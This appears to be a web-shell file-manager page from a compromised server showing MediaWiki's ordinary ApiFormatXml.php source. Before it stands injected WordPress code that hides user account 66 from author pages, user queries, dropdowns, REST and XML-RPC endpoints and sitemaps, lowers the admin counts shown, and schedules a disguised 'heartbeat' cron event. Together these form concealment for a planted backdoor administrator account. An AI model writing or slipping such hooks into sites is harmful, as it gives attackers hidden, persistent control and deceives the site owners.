add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/includes/api/ |
Upload File : |
<?php
/**
* Copyright © 2006 Yuri Astrakhan "<Firstname><Lastname>@gmail.com"
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
* http://www.gnu.org/copyleft/gpl.html
*
* @file
*/
namespace MediaWiki\Api;
use MediaWiki\Title\Title;
use MediaWiki\Xml\Xml;
use Wikimedia\ParamValidator\ParamValidator;
/**
* API XML output formatter
* @ingroup API
*/
class ApiFormatXml extends ApiFormatBase {
/** @var string */
private $mRootElemName = 'api';
/** @var string */
public static $namespace = 'http://www.mediawiki.org/xml/api/';
/** @var bool */
private $mIncludeNamespace = false;
/** @var string|null */
private $mXslt = null;
public function getMimeType() {
return 'text/xml';
}
public function setRootElement( $rootElemName ) {
$this->mRootElemName = $rootElemName;
}
public function execute() {
$params = $this->extractRequestParams();
$this->mIncludeNamespace = $params['includexmlnamespace'];
$this->mXslt = $params['xslt'];
$this->printText( '<?xml version="1.0"?>' );
if ( $this->mXslt !== null ) {
$this->addXslt();
}
$result = $this->getResult();
if ( $this->mIncludeNamespace && $result->getResultData( 'xmlns' ) === null ) {
// If the result data already contains an 'xmlns' namespace added
// for custom XML output types, it will override the one for the
// generic API results.
// This allows API output of other XML types like Atom, RSS, RSD.
$result->addValue( null, 'xmlns', self::$namespace, ApiResult::NO_SIZE_CHECK );
}
$data = $result->getResultData( null, [
'Custom' => static function ( &$data, &$metadata ) {
if ( isset( $metadata[ApiResult::META_TYPE] ) ) {
// We want to use non-BC for BCassoc to force outputting of _idx.
switch ( $metadata[ApiResult::META_TYPE] ) {
case 'BCassoc':
$metadata[ApiResult::META_TYPE] = 'assoc';
break;
}
}
},
'BC' => [ 'nobool', 'no*', 'nosub' ],
'Types' => [ 'ArmorKVP' => '_name' ],
] );
$this->printText(
static::recXmlPrint( $this->mRootElemName,
$data,
$this->getIsHtml() ? -2 : null
)
);
}
/**
* This method takes an array and converts it to XML.
*
* @param string|null $name Tag name
* @param mixed $value Tag value (attributes/content/subelements)
* @param int|null $indent Indentation
* @param array $attributes Additional attributes
* @return string
*/
public static function recXmlPrint( $name, $value, $indent, $attributes = [] ) {
$retval = '';
if ( $indent !== null ) {
if ( $name !== null ) {
$indent += 2;
}
$indstr = "\n" . str_repeat( ' ', $indent );
} else {
$indstr = '';
}
if ( is_object( $value ) ) {
$value = (array)$value;
}
if ( is_array( $value ) ) {
$contentKey = $value[ApiResult::META_CONTENT] ?? '*';
$subelementKeys = $value[ApiResult::META_SUBELEMENTS] ?? [];
if ( isset( $value[ApiResult::META_BC_SUBELEMENTS] ) ) {
$subelementKeys = array_merge(
$subelementKeys, $value[ApiResult::META_BC_SUBELEMENTS]
);
}
$preserveKeys = $value[ApiResult::META_PRESERVE_KEYS] ?? [];
$indexedTagName = isset( $value[ApiResult::META_INDEXED_TAG_NAME] )
? self::mangleName( $value[ApiResult::META_INDEXED_TAG_NAME], $preserveKeys )
: '_v';
$bcBools = $value[ApiResult::META_BC_BOOLS] ?? [];
$indexSubelements = isset( $value[ApiResult::META_TYPE] )
&& $value[ApiResult::META_TYPE] !== 'array';
$content = null;
$subelements = [];
$indexedSubelements = [];
foreach ( $value as $k => $v ) {
if ( ApiResult::isMetadataKey( $k ) && !in_array( $k, $preserveKeys, true ) ) {
continue;
}
$oldv = $v;
if ( is_bool( $v ) && !in_array( $k, $bcBools, true ) ) {
$v = $v ? 'true' : 'false';
}
if ( $name !== null && $k === $contentKey ) {
$content = $v;
} elseif ( is_int( $k ) ) {
$indexedSubelements[$k] = $v;
} elseif ( is_array( $v ) || is_object( $v ) ) {
$subelements[self::mangleName( $k, $preserveKeys )] = $v;
} elseif ( in_array( $k, $subelementKeys, true ) || $name === null ) {
$subelements[self::mangleName( $k, $preserveKeys )] = [
'content' => $v,
ApiResult::META_CONTENT => 'content',
ApiResult::META_TYPE => 'assoc',
];
} elseif ( is_bool( $oldv ) ) {
if ( $oldv ) {
$attributes[self::mangleName( $k, $preserveKeys )] = '';
}
} elseif ( $v !== null ) {
$attributes[self::mangleName( $k, $preserveKeys )] = $v;
}
}
if ( $content !== null ) {
if ( $subelements || $indexedSubelements ) {
$subelements[self::mangleName( $contentKey, $preserveKeys )] = [
'content' => $content,
ApiResult::META_CONTENT => 'content',
ApiResult::META_TYPE => 'assoc',
];
$content = null;
} elseif ( is_scalar( $content ) ) {
// Add xml:space="preserve" to the element so XML parsers
// will leave whitespace in the content alone
$attributes += [ 'xml:space' => 'preserve' ];
}
}
if ( $content !== null ) {
if ( is_scalar( $content ) ) {
// @phan-suppress-next-line PhanTypeMismatchArgumentNullable name is check for null in other code
$retval .= $indstr . Xml::element( $name, $attributes, $content );
} else {
if ( $name !== null ) {
$retval .= $indstr . Xml::element( $name, $attributes, null );
}
$retval .= static::recXmlPrint( null, $content, $indent );
if ( $name !== null ) {
$retval .= $indstr . Xml::closeElement( $name );
}
}
} elseif ( !$indexedSubelements && !$subelements ) {
if ( $name !== null ) {
$retval .= $indstr . Xml::element( $name, $attributes );
}
} else {
if ( $name !== null ) {
$retval .= $indstr . Xml::element( $name, $attributes, null );
}
foreach ( $subelements as $k => $v ) {
$retval .= static::recXmlPrint( $k, $v, $indent );
}
foreach ( $indexedSubelements as $k => $v ) {
$retval .= static::recXmlPrint( $indexedTagName, $v, $indent,
$indexSubelements ? [ '_idx' => $k ] : []
);
}
if ( $name !== null ) {
$retval .= $indstr . Xml::closeElement( $name );
}
}
} else {
// to make sure null value doesn't produce unclosed element,
// which is what Xml::element( $name, null, null ) returns
if ( $value === null ) {
// @phan-suppress-next-line PhanTypeMismatchArgumentNullable name is check for null in other code
$retval .= $indstr . Xml::element( $name, $attributes );
} else {
// @phan-suppress-next-line PhanTypeMismatchArgumentNullable name is check for null in other code
$retval .= $indstr . Xml::element( $name, $attributes, $value );
}
}
return $retval;
}
/**
* Mangle XML-invalid names to be valid in XML
* @param string $name
* @param array $preserveKeys Names to not mangle
* @return string Mangled name
*/
private static function mangleName( $name, $preserveKeys = [] ) {
static $nsc = null, $nc = null;
if ( in_array( $name, $preserveKeys, true ) ) {
return $name;
}
if ( $name === '' ) {
return '_';
}
if ( $nsc === null ) {
// Note we omit ':' from $nsc and $nc because it's reserved for XML
// namespacing, and we omit '_' from $nsc (but not $nc) because we
// reserve it.
$nsc = 'A-Za-z\x{C0}-\x{D6}\x{D8}-\x{F6}\x{F8}-\x{2FF}\x{370}-\x{37D}\x{37F}-\x{1FFF}' .
'\x{200C}-\x{200D}\x{2070}-\x{218F}\x{2C00}-\x{2FEF}\x{3001}-\x{D7FF}' .
'\x{F900}-\x{FDCF}\x{FDF0}-\x{FFFD}\x{10000}-\x{EFFFF}';
$nc = $nsc . '_\-.0-9\x{B7}\x{300}-\x{36F}\x{203F}-\x{2040}';
}
if ( preg_match( "/^[$nsc][$nc]*$/uS", $name ) ) {
return $name;
}
return '_' . preg_replace_callback(
"/[^$nc]/uS",
static function ( $m ) {
return sprintf( '.%X.', \UtfNormal\Utils::utf8ToCodepoint( $m[0] ) );
},
str_replace( '.', '.2E.', $name )
);
}
protected function addXslt() {
$nt = Title::newFromText( $this->mXslt );
if ( $nt === null || !$nt->exists() ) {
$this->addWarning( 'apiwarn-invalidxmlstylesheet' );
return;
}
if ( $nt->getNamespace() !== NS_MEDIAWIKI ) {
$this->addWarning( 'apiwarn-invalidxmlstylesheetns' );
return;
}
if ( !str_ends_with( $nt->getText(), '.xsl' ) ) {
$this->addWarning( 'apiwarn-invalidxmlstylesheetext' );
return;
}
$this->printText( '<?xml-stylesheet href="' .
htmlspecialchars( $nt->getLocalURL( 'action=raw' ) ) . '" type="text/xsl" ?>' );
}
public function getAllowedParams() {
return parent::getAllowedParams() + [
'xslt' => [
ApiBase::PARAM_HELP_MSG => 'apihelp-xml-param-xslt',
],
'includexmlnamespace' => [
ParamValidator::PARAM_DEFAULT => false,
ApiBase::PARAM_HELP_MSG => 'apihelp-xml-param-includexmlnamespace',
],
];
}
}
/** @deprecated class alias since 1.43 */
class_alias( ApiFormatXml::class, 'ApiFormatXml' );